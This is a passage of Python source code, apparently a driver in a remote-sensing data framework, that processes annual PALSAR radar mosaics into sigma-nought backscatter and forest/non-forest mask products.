fldindex_lon = feature.GetFieldIndex("lon")
lat = int(feature.GetField(fldindex_lat) + 0.5)
lon = int(feature.GetField(fldindex_lon) - 0.5)
if lat < 0:
lat_h = 'S'
else:
lat_h = 'N'
if lon < 0:
lon_h = 'W'
else:
lon_h = 'E'
tile = lat_h + str(abs(lat)).zfill(2) + lon_h + str(abs(lon)).zfill(3)
return tile
class sarannualAsset(Asset):
Repository = sarannualRepository
_sensors = {
#'AFBS': 'PALSAR FineBeam Single Polarization',
'PALSAR': {'description': 'PALSAR Mosaic (FineBeam Dual Polarization)'},
#'AWB1': 'PALSAR WideBeam (ScanSAR Short Mode)',
#'JFBS': 'JERS-1 FineBeam Single Polarization'
}
_assets = {
'MOS': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_MOS\.tar\.gz$'
},
'FNF': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_FNF\.tar\.gz$'
},
}
_defaultresolution = [0.00044444444, 0.00044444444]
def __init__(self, filename):
""" Inspect a single file and get some basic info """
super(sarannualAsset, self).__init__(filename)
bname = os.path.basename(filename)
self.asset = bname[11:14]
self.tile = bname[0:7]
self.sensor = 'PALSAR'
self.date = datetime.datetime.strptime(bname[8:10], '%y')
self.rootname = bname[0:10]
def extract(self, filenames=[]):
""" Extract filesnames from asset """
files = super(sarannualAsset, self).extract(filenames)
datafiles = {}
for f in files:
bname = os.path.basename(f)
if f[-3:] != 'hdr':
bandname = bname[len(self.rootname) + 1:]
datafiles[bandname] = f
return datafiles
class sarannualData(Data):
""" Tile of data """
name = 'SARAnnual'
version = '0.9.0'
Asset = sarannualAsset
_pattern = '*'
_products = {
'sign': {
'description': 'Sigma nought (radar backscatter coefficient)',
'assets': ['MOS'],
},
'fnf': {
'description': 'Forest/NonForest Mask',
'assets': ['FNF'],
}
}
def meta(self, tile):
""" Get metadata for this tile """
return {'CF': -83.0}
def find_files(self):
""" Search path for valid files """
filenames = super(sarannualData, self).find_files()
filenames[:] = [f for f in filenames if os.path.splitext(f)[1] != '.hdr']
return filenames
def process(self, *args, **kwargs):
""" Process all requested products for this tile """
products = super(sarannualData, self).process(*args, **kwargs)
if len(products) == 0:
return
self.basename = self.basename + '_' + self.sensor_set[0]
for key, val in products.requested.items():
fname = os.path.join(self.path, self.basename + '_' + key)
# Verify that asset exists
a_type = self._products[val[0]]['assets'][0]
a_obj = self.assets.get(a_type)
if a_obj is None:
utils.verbose_out("Asset {} doesn't exist for tile {}".format(a_type, self.id), 3)
continue
datafiles = None
with utils.error_handler("Error extracting files from asset {}".format(a_obj.filename),
continuable=True):
datafiles = a_obj.extract()
if datafiles is None:
continue
if val[0] == 'sign':
bands = [datafiles[b] for b in ["sl_HH", "sl_HV"] if b in datafiles]
if len(bands) > 0:
img = gippy.GeoImage(bands)
img.set_nodata(0)
mask = gippy.GeoImage(datafiles['mask'], False)
img.AddMask(mask[0] == 255)
imgout = gippy.GeoImage.create_from(img, fname, 'float32')
imgout.set_nodata(-32768)
for b in range(0, len(imgout)):
imgout.set_bandname(img[b].description(), b + 1)
(img[b].pow(2).log10() * 10 - 83.0).save(imgout[b])
fname = imgout.filename()
img = None
imgout = None
[RemoveFiles([f], ['.hdr', '.aux.xml']) for k, f in datafiles.items() if k != 'hdr']
if val[0] == 'fnf':
if 'C' in datafiles:
# rename both files to product name
os.rename(datafiles['C'], fname)
os.rename(datafiles['C'] + '.hdr', fname + '.hdr')
img = gippy.GeoImage(fname)
img.set_nodata(0)
img = None
self.AddFile(self.sensor_set[0], key, fname)
| gpl-3.0 | 4,833,266,800,454,739,000 | 35.943182 | 104 | 0.527222 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.